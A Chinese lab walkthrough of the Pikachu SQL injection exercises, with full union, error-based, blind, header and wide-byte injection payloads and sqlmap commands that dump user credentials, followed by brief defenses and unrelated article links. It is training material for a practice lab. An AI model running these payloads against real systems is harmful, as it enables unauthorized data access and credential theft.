来日可期x

Pikachu靶场——SQL注入漏洞

文章目录

1. SQL注入（Sql Inject）
- 1.1 数字型注入(post)
- 1.2 字符型注入(get)
- 1.3 搜索型注入
- 1.4 XX型注入
- 1.5 "insert/update"注入
- 1.6 "delete"注入
- 1.7 HTTP头注入
- 1.8 盲注(base on boolian)
- - 1.8.1 ASCII试探
  - 1.8.2 SqlMap工具注入
- 1.9 盲注(base on time)
- 1.10 宽字节注入
- 1.11 SQL注入漏洞防御

1. SQL注入（Sql Inject）

在owasp发布的top10排行榜里，注入漏洞一直是危害排名第一的漏洞，其中注入漏洞里面首当其冲的就是数据库注入漏洞。

SQL注入漏洞主要形成的原因是在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。

在构建代码时，一般会从如下几个方面的策略来防止SQL注入漏洞：

对传进SQL语句里面的变量进行过滤，不允许危险字符传入。
使用参数化（Parameterized Query 或 Parameterized Statement）。
还有就是，目前有很多ORM框架会自动使用参数化解决注入问题，但其也提供了"拼接"的方式，所以使用时需要慎重!

SQL注入漏洞。

1.1 数字型注入(post)

首先在页面中选择一个参数进行查询

使用bp抓包查看

这里采用post方式传递数据，id=1&submit=%E6%9F%A5%E8%AF%A2，可以确认的是数字型，这里可以直接在bp中修改数据包，也可以使用hackbar。

判断字段个数

id=1 order by 2&submit=%E6%9F%A5%E8%AF%A2

浏览器页面显示

一共两个字段。

联合查询获取数据

id=1 union select database(),user()&submit=%E6%9F%A5%E8%AF%A2

database()：将会返回当前网站所使用的数据库名字。
user()：将会返回执行当前查询的用户名。

获取到了数据名为pikachu。

获取表名

information_schema 是 mysql 自带的一张表，这张数据表保存了 Mysql 服务器所有数据库的信息，如数据库名，数据库的表，表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表，该表包含两个字段 table_name 和 table_schema，分别记录 DBMS 中的存储的表名和表名所在的数据库。

id=1 union select table_name,2 from information_schema.tables where table_schema = 'pikachu'&submit=%E6%9F%A5%E8%AF%A2

浏览器页面显示

获取到了五张表：httpinfo,member,message,users,xssblind而我们要对users这个表进行破解字段。

获取表中的字段名

id=1 union select column_name,2 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'&submit=%E6%9F%A5%E8%AF%A2

浏览器页面显示

获取到了字段有id，username，password，level。

查看用户名和密码

id=1 union select username,password from users&submit=%E6%9F%A5%E8%AF%A2

浏览器页面显示

1.2 字符型注入(get)

输入一个名字查看

发现输入的参数会在URL上显示出来，说明php页面通过get方法传递参数，所以这里不需要抓包。

直接在输入框中执行SQL注入命令。

判断字段个数

lucy' order by 2 #

联合查询获取数据

lucy' union select database(),user()#

获取表名

lucy' union select table_name,2 from information_schema.tables where table_schema = 'pikachu'#

获取表中的字段名

lucy' union select column_name,2 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'#

查看用户名和密码

lucy' union select username,password from users#

1.3 搜索型注入

漏洞分析

搜索型注入，常见是使用like进行查找搜索（模糊匹配），数据库的搜索语句一般是。

select * from 表名 where username like '%$name%'

所以我们可以利用order判断字段数

判断字段个数

lucy%' order by 3#

(%'是闭合前面，#是注释后面)

联合查询获取数据

luc%' union select database(),user(),3#

由于有三个字段，所以要在查询的时候再添加一个查询条件。

获取表名

lucy%' union select table_name,2,3 from information_schema.tables where table_schema = 'pikachu'#

获取表中的字段名

lucy%' union select column_name,2,3 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'#

查看用户名和密码

lucy%' union select username,password,id from users#

1.4 XX型注入

所谓的XX型注入, 就是输入的值可能被各种各样的符合闭合 (比如, 单引号双引号括号等)，所以需要找到闭合。

首先输入单引号

推测数据库查询语句为：

select * from users where username=('$name');

判断字段个数

lucy') order by 2 #

联合查询获取数据

lucy') union select database(),user()#

获取表名

lucy') union select table_name,2 from information_schema.tables where table_schema = 'pikachu'#

获取表中的字段名

lucy') union select column_name,2 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'#

查看用户名和密码

lucy') union select username,password from users#

1.5 "insert/update"注入

首先注册一个账号

填写注册信息

点击提交的时候抓包查看

漏洞分析：产生insert/update注入，是因为在用户注册和更新信息的时候存在注入点。

首先分析insert注入：

insert注入存在于用户注册时候的过程，当用户注册新信息并提交服务器的时候，服务端采用insert来将信息插入数据库。

insert语句：

insert into users(username,password)values($username,$password);

update语句：

update users set username=$username,password=$password where username=$username;

漏洞利用

用updatexml()进行报错注入。

updatexml() 是 MySQL 数据库中的一个函数，用于在 XML 字符串中更新指定路径的值。
updatexml(xml_target, xpath_expr, new_value)
参数解析：

xml_target：要更新的 XML 字符串或 XML 类型的列。

xpath_expr：XPath 表达式，指定要更新的节点路径。

new_value：String格式，替换查找到的符合条件的数据要替换的新值。

注意：

如果找不到与给定的 XPath 表达式匹配的节点，updatexml() 函数将返回 NULL。

如果在更新节点时遇到错误（例如，无效的 XPath 表达式），函数将抛出错误。

将之前抓包的数据发送到重发器上，在用户名后面输入如下内容：

username=wuhu' and updatexml(1,0x7e,3)and '&password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit

可以看到有报错回复。

获取数据库名

username=wuhu' and updatexml(1,concat(0x7e,database()),3)and '&password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit

说明： concat(0x7e,database())，这是一个函数调用，将两个字符串进行连接。其中 0x7e 是波浪号（tilde）的十六进制表示，database() 是一个 SQL 函数，用于返回当前数据库的名称。

获取表名

username=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu' )),3) and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit

说明：GROUP_CONCAT() 是一个 SQL 聚合函数，用于将多行结果按照指定的顺序连接成一个字符串。

获取字段名

username=123' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),3)and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit

这里推荐使用HackBar，bp看着眼睛疼。

limit 0,1			user_id
limit 1,1			first_name
limit 2,1			last_name
limit 3,1			user
limit 4,1			password

获取用户名和密码

用户名：

username=123' and updatexml(1,concat(0x7e,(select username from users limit 0,1 ),0x7e),3)and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit

密码：

username=123' and updatexml(1,concat(0x7e,(select substr(password,1,16) from users limit 0,1),0x7e),3)and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit

username=123' and updatexml(1,concat(0x7e,(select substr(password,1,16) from users limit 1,1),0x7e),3)and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit

参数说明：

substr()：用于从字符串中提取子串。
函数原型：
```
SUBSTR(string, start_position, length)
```
- string：要提取子串的原始字符串。
- start_position：指定子串开始的位置（索引），其中第一个字符的索引为 1。
- length：可选参数，指定要提取的子串的长度。

这里密码太长了，分段显示。

1.6 "delete"注入

delete也是利用报错进行sql盲注。

在留言板中随便输入，然后提交

在删掉留言的时候抓包，发现有id，试着利用这个id作一个报错注入。

获取数据库名称

http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

获取数据库中的表

http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)

获取users表中的字段

http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1)

获取用户名和密码

用户名

http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)

密码

http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select substr(password,1,16) from users limit 0,1),0x7e),1)

http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select substr(password,17,32) from users limit 0,1),0x7e),1)

1.7 HTTP头注入

登录后页面效果

点击退出进行抓包查看，在下图红框中进行注入

判断闭合

输入单引号，页面报错

后面添加注释

注释掉还报错，考虑前/后闭合。123' and '1。

获取数据库名

123' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1

获取数据库中的表

123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1

获取users表中的字段

123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) and '1

获取用户名和密码

用户名

123' and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) and '1

密码

123' and updatexml(1,concat(0x7e,(select substr(password,1,16) from users limit 0,1),0x7e),1) and '1

123' and updatexml(1,concat(0x7e,(select substr(password,17,32) from users limit 0,1),0x7e),1) and '1

1.8 盲注(base on boolian)

1.8.1 ASCII试探

判断闭合

输入lucy’，用户名不存在，然后在后面加上注释

lucy' #

说明是字符型注入。

获取数据库名

lucy' and length(database())=8 #

lucy' and length(database())=7 #

说明数据库名称有7位，接下来就是获取数据库中的每一位是什么了。

按位测试

lucy' and ascii(substr(database(),1,1))=115 #  	# 第1位p

说明：

ASCII 表。
ascii() 是一个常见的函数或方法名称，用于获取字符的 ASCII 码值。
下图中的%23是井号的URL编码。

按照这样的方式反复尝试，获取到数据库名：pikachu

lucy' and ascii(substr(database(),2,1))=105 %23	 	#第2位i
lucy' and ascii(substr(database(),3,1))=107 %23	 	#第3位k
lucy' and ascii(substr(database(),4,1))=97 %23	 	#第4位a
lucy' and ascii(substr(database(),5,1))=99 %23	 	#第5位c
lucy' and ascii(substr(database(),6,1))=104 %23	 	#第6位h
lucy' and ascii(substr(database(),7,1))=117 %23	 	#第6位u

获取数据库表名

lucy' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=104 %23

lucy' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),2,1))=116 %23

这里通过之前获取到的数据库表名有httpinfo，member，message，users，xssblind。

同样表中的字段，以及用户名和密码，都是以这种盲注的形式来获取的。

1.8.2 SqlMap工具注入

使用sqlmap工具进行输入。

使用bp抓包截取cookie信息

启动sqlmap，在上图中复制URL和cookie，在sqlmap中输入：sqlmap –u ‘复制的URL’ --cookie=’复制的cookie’ 。

获取数据库名

sqlmap -u "http://192.168.188.183//pikachu/vul/sqli/sqli_blind_b.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2" --cookie="PHPSESSID=bdv4iol6gtj7mv1fp4lppnqtg0" --dbs

获取数据库中的表

sqlmap -u "http://192.168.188.183//pikachu/vul/sqli/sqli_blind_b.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2" --cookie="PHPSESSID=bdv4iol6gtj7mv1fp4lppnqtg0"  -D "pikachu" --tables

获取表中的字段

sqlmap -u "http://192.168.188.183//pikachu/vul/sqli/sqli_blind_b.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2" --cookie="PHPSESSID=bdv4iol6gtj7mv1fp4lppnqtg0"  -D "pikachu" -T "users" --columns

获取用户名和密码

sqlmap -u "http://192.168.188.183//pikachu/vul/sqli/sqli_blind_b.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2" --cookie="PHPSESSID=bdv4iol6gtj7mv1fp4lppnqtg0"  -D "pikachu" -T "users" -C "username,password" --dump

1.9 盲注(base on time)

用sleep() 语句的延时性，以时间线作为判断条件。如果成功执行了，就延时x秒。

判断闭合

kobe' and sleep(5) #

在输入单引号的时候，页面直接刷新成功，在后加上注释，页面延时了5秒，证明闭合方式为单引号。

获取数据库长度

kobe' and if(length(database())=7,sleep(5),1) #

获取数据库名称

kobe' and if(substr(database(),1,1)='p' ,sleep(5),1) #

获取数据库中的第一个表的第一个字母

kobe' and if(ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=104 ,sleep(5),1) #

其他就不在演示，都是相同的道理，主要是太麻烦了。

总结：时间盲注整体上是在布尔盲注的基础上增加if判断，并且与sleep配合，布尔盲注是当对的时候，返回正确的值，错误的时候返回错误的值。而时间盲注，不管正确还是错误都不会返回值，需要依靠延迟来判断。

同样这里可以使用sqlmap工具注入的方式来破解。

1.10 宽字节注入

宽字节注入准确来说不是注入手法，而是另外一种比较特殊的情况。

GBK 汉字编码方案，双字节编码，两个字节作为一个汉字。GBK 编码范围[8140,FEFE]，可以通过汉字字符集编码查询。

判断闭合

输入kobe，页面正常显示

接着输入单引号，发现页面报错，抓包查看。

服务器将单引号进行了转义，单引号由原来的'转换为了\'，这里面的\ 表示5c，那么我们现在可以使用GBK编码，在5c前面添加一个字符，使得该字符与5c组合为一个汉字。（这个字符的范围在[8140,FEFE]之间即可）

我们在前面加上%81就是%81%5c%27，%81%5c会被编码为一个汉字。

kobe%81' or 1=1 #

获取数据库名

name=kobe%81' union select table_name,2 from information_schema.tables where table_schema = database()# &submit=%E6%9F%A5%E8%AF%A2

获取users表中的字段名

由于单引号被转义了，所以可以采用十六进制的方式来代替’user‘的使用。

name=kobe%81' union select column_name,2 from information_schema.columns where table_schema = database() and table_name=0x7573657273 # &submit=%E6%9F%A5%E8%AF%A2

获取用户名和密码

name=kobe%81' union select username,password from users # &submit=%E6%9F%A5%E8%AF%A2

1.11 SQL注入漏洞防御

避免采用拼接的方式构造SQL 语句，可以采用预编译等技术。
对进入SQL 语句的参数进行足够过滤。
部署安全设备比如WAF（web应用安全防火墙）。
现行很多开发框架，基本上已经从技术上，解决SQL 注入问题。

你可能感兴趣的:(网络安全,系统安全,web安全,pikachu,SQL注入,sql)

架构设计（13）安全架构设计理论 CoderIsArt 架构设计研究安全架构安全
网络安全设计网络安全架构设计是为了保护信息系统免受各种网络攻击和威胁而进行的系统化设计。它涉及设计网络基础设施、配置安全控制、制定安全策略，以及实施和维护这些策略，以确保数据的机密性、完整性和可用性。下面是网络安全架构设计的详细内容，包括关键组件、设计原则和实际案例。1.网络安全架构设计的关键组件1.1网络边界保护防火墙：用于过滤网络流量，根据设定的安全规则允许或阻止数据包进入或离开网络。分为传统
缓存读写策略 Cache Aside Pattern，开发必备架构师修炼缓存缓存 java 读写策略分布式
我们在前面讲到了当我们业务面临大量写并发的时候，将数据库开发成分布式存储系统，然后又介绍了NoSql数据库与关系型数据库互相配合，以用来更好的服务与我们的业务发展。但随着并发的持续增加，存储数据量的增多，数据库的磁盘IO逐渐成了系统的瓶颈，我们需要一种访问更快的组件来降低请求响应时间，提升整体系统性能，这时我们就会使用到缓存。至于缓存这个概念，这里就不去多说了，我相信大家都懂，也知道它的作用是为了
需要多次执行sql语句时，使用预编译 lbmydream java java web sql java
1、Statement为每一条Sql语句生成执行计划，如果要执行两条sql语句selectcolumefromtablewherecolume=1;selectcolumefromtablewherecolume=2;会生成两个执行计划，一千个查询就生成一千个执行计划。而生成计划是非常消耗资源的2、PreparedStatement用于使用绑定变量重用执行计划select*fromxxx.some
Sqlite3数据库的学习 smile202066 数据库
数据存储方式1、内存存数据:当程序运行结束，掉电，数据丢失。(数组、链表、变量等)2、硬盘存数据:程序运行结束，掉电，数据不丢失(1)文件:对数据管理(增删改查)效率低.(2)数据库:专业存储数据，可存大量数据。对数据管理效率高，使用方便。常用数据库:1.关系型数据库：将复杂的数据结构简化为二维表格形式大型:Oracle、DB2中型:MySql、SQLServer小型:Sqlite2.非关系型数据
Node.js+SQLite后端数据库的读写与操作示例阿赛工作室 mysql SQLite nodejs 数据库 sqlite node.js
SQLite数据的封装体varsqlite3=require('sqlite3').verbose();//sqlites数据库地址varpath=require('path');varsqliteDbPath=path.resolve(__dirname,'./sqlite3.db');//打开sqlites数据库varsqlite3Connection=newsqlite3.Database(
在Node.js中从创建数据库到使用sqlite各项API 不愿透漏姓名的郭某 node.js 数据库 javascript sqlite sql 前端 html5
安装sqlite3模块npminstallsqlite3创建数据库constsqlite3=require('sqlite3').verbose();//创建数据库连接letdb=newsqlite3.Database('database.db',sqlite3.OPEN_READWRITE,(err)=>{if(err){console.error(err.message);return;}co
SQLite 创建表：一场数据库里的“造物运动” 软考鸭 sqlite sqlite 数据库
嘿，各位数据库的“造物主”们！今天咱们来聊聊SQLite里的一场有趣活动——创建表。没错，就像上帝创造了世界，我们也可以在SQLite数据库里创造属于我们自己的“小世界”。一、创建表的“魔法咒语”在SQLite这个“魔法世界”里，创建表其实就像念一句“魔法咒语”：CREATETABLEtable_name(column1datatype,column2datatype,column3datatyp
Node.js sqlite3事件深入解析：trace、profile、change、error、open 软考鸭 sqlite nodejs帮助文档 node.js sqlite 数据库
在Node.js环境中，sqlite3库不仅提供了丰富的API用于数据库操作，还定义了一系列的事件，使得开发者能够监听和响应数据库操作过程中的各种状态变化。本文将深入解析sqlite3库中的trace、profile、change、error、open这五个事件，包括它们的作用、触发时机以及如何使用代码进行监听和处理。一、事件概述trace事件：当数据库执行SQL语句时触发，可以用于跟踪和记录SQ
sqlite3的db.serialize方法：确保数据库操作串行化的利器软考鸭 sqlite nodejs帮助文档数据库 sqlite jvm
在Node.js中，sqlite3是一个广受欢迎的轻量级数据库库，它提供了一个简洁的API来与SQLite数据库进行交互。在进行数据库操作时，为了确保操作的串行化执行，避免并发问题，sqlite3提供了db.serialize方法。本文将深入解析db.serialize方法，包括其API函数定义和相应的代码示例解释。一、db.serialize方法简介db.serialize方法用于将多个SQL语
数据库课程设计mysql 天蓝蓝23528 数据库课程设计 mysql
一、项目背景与需求分析1.1项目背景假设我们需要为一个名为“智慧校园”的系统设计数据库。该系统旨在整合校园内的各种资源，包括学生信息、教职工信息、课程信息、成绩管理、图书借阅、食堂消费等，以提高校园管理的效率和便捷性。1.2需求分析通过对智慧校园系统的功能需求进行调研和分析，我们可以总结出以下几个主要的数据管理需求：学生信息管理：包括学生的基本信息（如学号、姓名、性别、年龄、专业、班级等）、联系方
SQLite3 数据类型深入全面讲解软考鸭 nodejs帮助文档 sqlite sqlite 数据库
SQLite3，作为一款轻量级的数据库管理系统，在数据存储方面展现出了其独特的魅力。它不仅支持标准的SQL语法，还提供了丰富的数据类型供开发者选择。这些数据类型不仅涵盖了基本的数值和文本类型，还包括了日期时间、二进制数据等复杂类型。本文将深入全面地讲解SQLite3的数据类型，帮助开发者更好地理解和应用这一强大的数据库工具。一、SQLite3数据类型概述SQLite3的数据类型系统相对简单，但又不
基于SpringBoot+Vue协同过滤视频推荐系统 f168bc2b3926
1.技术介绍java+springboot+mysql+mybatis+Vue开发工具：eclipse或idea2.主要功能说明：1）用户注册、登录、首页、个人中心、我的收藏、视频新增、后台管理、2）管理员个人中心、用户管理、视频标签管理、视频信息管理、轮播图管理3）协同过滤算法根据用户的收藏喜好行为计算相似度，给有相近的用户行为推荐视频比如：用户1收藏了视频1、2、3用户2收藏了视频1、3、6用
Python3 | 练气期，入门初识与起步! 全栈工程师修炼指南企业IT运维实践 python
[知识是人生的灯塔，只有不断学习，才能照亮前行的道路]0x00前言简述描述：作为一名网络安全转运维的工程师，每天一睁眼就要马不停蹄的学习各类计算机技术、编程和网络安全知识等，在工作中接触过很多编程语言，比如：C、Java、Python、PHP、Shell、PowerShell等，但都仅仅停留在看得懂一些，会简单使用一些的阶段，却没有去深入的了解过这些语言。正好这才趁着进行机器学习的机会，将Pyth
ubuntu环境快速安装mysql 编码小哥数据库 mysql 数据库
1、环境准备因为默认安装的源的地址都是国外地址，有时是被防火墙拦截，有时是速度太慢，有时是有些安装包在上面根本就找不到，所以需要替换成国内的源。1.1先将之前的源列表文件备份先备份sources.list文件,执行命令：cp/etc/apt/sources.list/etc/apt/sources.list-bak回车1.2、修改sources.list文件该文件路径为：/etc/apt/sour
Django学习日志三：模型层 Z天南之城Z python 后端 django入门 django 学习 python
Django学习日志三：模型层1日志一我们学习了Django的配置，详见：Django学习日志一Django的配置日志二我们学习了创建第一个django项目，详见：Django学习日志二——创建第一个django项目下面我们来学习模型层的使用：五、模型层模型层用于和数据交互。可以通过模型和关系型数据库实现持久化的操作。在Django开发中主要以MySQL作为首选数据库，同时使用非关系型数据库Mon
MySQL 索引廿四味£ 数据库 mysql 数据库
目录一、索引1.索引的概念2．索引的作用3.索引的副作用4.工作方式5.创建索引的原则依据6.索引的分类和创建7．查看索引8．删除索引二、生产环境中遇到的问题及解决办法一、索引1.索引的概念●是一个排序的列表，存储着索引值和这个值所对应的物理地址●无须对整个表进行扫描，通过物理地址就可以找到所需数据●是表中一列或者若干列值排序的方法●需要额外的磁盘空间2．索引的作用●设置了合适的索引之后，数据库利
MySQL 管理：全面指南 wjs2024 开发语言
MySQL管理：全面指南引言MySQL是目前最流行的开源关系数据库管理系统之一，以其高性能、易用性和可靠性而闻名。本篇文章将深入探讨MySQL的管理，包括安装、配置、性能优化、安全性和备份恢复等方面，旨在为数据库管理员和开发者提供一份全面的管理指南。目录MySQL简介MySQL安装与配置MySQL性能优化MySQL安全性管理MySQL备份与恢复MySQL高可用与集群MySQL监控与维护MySQL常
Mysql索引陈年小趴菜 mysql mysql 数据库笔记
目录一、索引底层实现原理二、数据结构为B+树三、索引分类四、索引的设计原则五、扩展知识点一、索引底层实现原理索引的作用：提高查询效率Mysql数据存储：磁盘索引数据存储：磁盘Mysql应用程序启动时将磁盘的索引数据加载到内存中，减少IO次数，减少IO量（大小）。大文件加载到内存中时，采用分块读取，块大小默认为16k。showvariableslike'innodb_page_size';值/102
深入分析和优化MySQL主从复制延迟的技术指南 molashaonian MySQL mysql 数据库主从同步延迟表结构变更
在高并发和大数据量的数据库环境中，主从复制延迟是一个常见的问题。特别是当多个数据库共享同一个实例时，资源竞争会更加激烈，从而导致复制延迟。本文将深入分析导致主从复制延迟的可能原因，解释其根本原因，并提供优化方案以减少复制延迟，提高数据库系统的整体性能。MySQL主从复制原理在讨论具体的优化方案之前，了解MySQL的主从复制原理是至关重要的。主从复制的基本过程主服务器（Master）记录变更：在主服
物联网架构之HBase Linux运维老纪一蹴而就揭秘物联网“点石成金”的魔法架构 hbase 运维开发 linux 云计算
欢迎来到我的博客，很高兴能够在这里和您见面！希望您在这里可以感受到一份轻松愉快的氛围，不仅可以获得有趣的内容和知识，也可以畅所欲言、分享您的想法和见解。推荐:Linux运维老纪的首页,持续学习,不断总结,共同进步,活到老学到老导航剑指大厂系列:全面总结运维核心技术:系统基础、数据库、网路技术、系统安全、自动化运维、容器技术、监控工具、脚本编程、云服务等。常用运维工具系列:常用的运维开发工具,zab
利用LangChain构建MySQL数据库问答代理 Free_Gemini langchain 数据库 mysql python
引言随着自然语言处理技术的飞速发展，尤其是大型语言模型（LLM）的应用日益广泛，人们对于如何更高效地与这些模型交互产生了浓厚的兴趣。LangChain是一个旨在简化与语言模型集成的开源框架，它使得开发者能够轻松地构建出强大的应用程序。本文将介绍如何使用LangChain结合MySQL数据库创建一个简单的问答代理。LangChain简介LangChain是一个开源项目，它的目标是让开发者更容易地创建
NoSQL是非关系型数据库潘志杰_34fd
NoSQL是非关系型数据库，NoSQL=NotOnlySQL。关系型数据库采用的结构化的数据，NoSQL采用的是键值对的方式存储数据。在处理非结构化/半结构化的大数据时；在水平方向上进行扩展时；随时应对动态增加的数据项时可以优先考虑使用NoSQL数据库。在考虑数据库的成熟度；支持；分析和商业智能；管理及专业性等问题时，应优先考虑关系型数据库。
【网络安全】分析cookie实现PII IDOR 秋说网络安全 web安全漏洞挖掘
未经许可，不得转载。文章目录正文正文目标：公共电子商务类型的网站，每月有大约6万到10万访问者，注册用户大约有5万。存在一个查询个人资料的端点/GetProfiledetails，以下是完整的请求和响应：我发现，cookie非常类似于base64编码后的结果，于是我将其进行base64解码：可以看到，cookie中存在一个UserID为509071，即我的ID。因此，我将ID参数修改，进行base
MySQL用binlog日志恢复数据 weixin_47354082 MySQL mysql 数据库
原理：binlog日志保存的是数据变化的DDL和DMLSQL，并在每条SQL打上了时间缀和标记，所以可以指定时间和标记，找到指定SQL，恢复特定数据。实战：从删库到恢复，不用再跑路。1、建库建表准备数据再删库mysql>flushbinarylogs;QueryOK,0rowsaffected(0.01sec)mysql>createdatabasemydb;QueryOK,1rowaffecte
mysql 主从复制不生效_Mysql主从（主从不同步解决办法，常见问题及解决办法，在线对mysql做主从复制）... weixin_39716971 mysql 主从复制不生效
先上Master库：mysql>showprocesslist;查看下进程是否Sleep太多。发现很正常。showmasterstatus;也正常。mysql>showmasterstatus;+-------------------+----------+--------------+-------------------------------+|File|Position|Binlog_Do
mysql如何利用binlog进行数据恢复详解 LY破晓 mysql mysql binlog
前言最近线上误操作了一个数据，由于是直接修改的数据库，所有唯一的恢复方式就在mysql的binlog。binlog使用的是ROW模式，即受影响的每条记录都会生成一个sql。同时利用了binlog2sql项目。MySQLBinaryLog也就是常说的bin-log,,是mysql执行改动产生的二进制日志文件,其主要作用有两个:数据回复主从数据库。用于slave端执行增删改，保持与master同步。b
mysql的半同步模式 best keyl mysql 数据库
1.半同步模式原理mysql的主备库通过binlog日志保持一致，主库本地执行完事务，binlog日志落盘后即返回给用户；备库通过拉取主库binlog日志来同步主库的操作。默认情况下，主库与备库并没有严格的同步，因此存在一定的概率备库与主库的数据是不对等的。半同步特性的出现，就是为了保证在任何时刻主备数据一致的问题。相对于异步复制，半同步复制要求执行的每一个事务，都要求至少有一个备库成功接收后，才
Mysql -- 组复制「已注销」 Mysql 组复制
一.组复制复制组能够以一种自动优先选择的单主模式运行，在某个时间只有一个服务器接受更新。但是对于更高优先级的用户，组能够以多主模式部署，所有的服务器都能够接受更新，即使他们是同时发生的。组复制中存在着一种内建的组成员关系服务用来保持组的视图一致，并且在任意时间对于组中的所有的服务器都可用。MySQL服务器能够退出或者加入组中，而且视图也会相应的更新。有时服务器可能会意外的退出组（故障），在这种情况
MySQL NOT EXISTS 真的不走索引么，如何优化 NOT EXISTS？码农小光
作者：夜风_BLOG来源：https://blog.csdn.net/guanfengliang1988/article/details/92814376在一些业务场景中，会使用NOTEXISTS语句确保返回数据不存在于特定集合，部分同事会发现NOTEXISTS有些场景性能较差，甚至有些网上谣言说”NOTEXISTS不走索引”，哪对于NOTEXISTS语句，我们如何优化呢？以今天优化的SQL为例，
Ubuntu安装PostgreSQL unhurried人生——冕临数据库 postgresql
注：本文章的ubuntu的版本为：ubuntu-20.04.6-live-server-amd64。Ubuntu（在线版）更新软件源sudoapt-getupdate添加PostgreSQL官方数字签名wget--quiet-O-https://www.postgresql.org/media/keys/ACCC4CF8.asc|sudoapt-keyadd-将地址添加到系统的软件包源列表中ech
java解析APK 3213213333332132 java apk linux 解析APK
解析apk有两种方法 1、结合安卓提供apktool工具，用java执行cmd解析命令获取apk信息 2、利用相关jar包里的集成方法解析apk 这里只给出第二种方法，因为第一种方法在linux服务器下会出现不在控制范围之内的结果。 public class ApkUtil { /** * 日志对象 */ private static Logger
nginx自定义ip访问N种方法 ronin47 nginx 禁止ip访问
　　　因业务需要，禁止一部分内网访问接口，　由于前端架了F5，直接用deny或allow是不行的，这是因为直接获取的前端Ｆ５的地址。　　　所以开始思考有哪些主案可以实现这样的需求，目前可实施的是三种：　　　一：把ip段放在redis里，写一段lua 二：利用geo传递变量，写一段
mysql timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性 dcj3sjt126com mysql
timestamp有两个属性，分别是CURRENT_TIMESTAMP 和ON UPDATE CURRENT_TIMESTAMP两种，使用情况分别如下： 1. CURRENT_TIMESTAMP 当要向数据库执行insert操作时，如果有个timestamp字段属性设为 CURRENT_TIMESTAMP，则无论这
struts2+spring+hibernate分页显示 171815164 Hibernate
分页显示一直是web开发中一大烦琐的难题，传统的网页设计只在一个JSP或者ASP页面中书写所有关于数据库操作的代码，那样做分页可能简单一点，但当把网站分层开发后，分页就比较困难了，下面是我做Spring+Hibernate+Struts2项目时设计的分页代码，与大家分享交流。　　1、DAO层接口的设计，在MemberDao接口中定义了如下两个方法： public in
构建自己的Wrapper应用 g21121 rap
我们已经了解Wrapper的目录结构，下面可是正式利用Wrapper来包装我们自己的应用，这里假设Wrapper的安装目录为:/usr/local/wrapper。首先，创建项目应用 &nb
[简单]工作记录_多线程相关 53873039oycg 多线程
最近遇到多线程的问题,原来使用异步请求多个接口(n*3次请求) 方案一使用多线程一次返回数据,最开始是使用5个线程,一个线程顺序请求3个接口,超时终止返回缺点测试发现必须3个接
调试jdk中的源码，查看jdk局部变量程序员是怎么炼成的 jdk 源码
转自：http://www.douban.com/note/211369821/ 学习jdk源码时使用-- 学习java最好的办法就是看jdk源代码，面对浩瀚的jdk（光源码就有40M多，比一个大型网站的源码都多）从何入手呢，要是能单步调试跟进到jdk源码里并且能查看其中的局部变量最好了。可惜的是sun提供的jdk并不能查看运行中的局部变量
Oracle RAC Failover 详解 aijuans oracle
Oracle RAC 同时具备HA(High Availiablity) 和LB(LoadBalance). 而其高可用性的基础就是Failover(故障转移). 它指集群中任何一个节点的故障都不会影响用户的使用，连接到故障节点的用户会被自动转移到健康节点，从用户感受而言，是感觉不到这种切换。 Oracle 10g RAC 的Failover 可以分为3种： 1. Client-Si
form表单提交数据编码方式及tomcat的接受编码方式 antonyup_2006 JavaScript tomcat 浏览器互联网 servlet
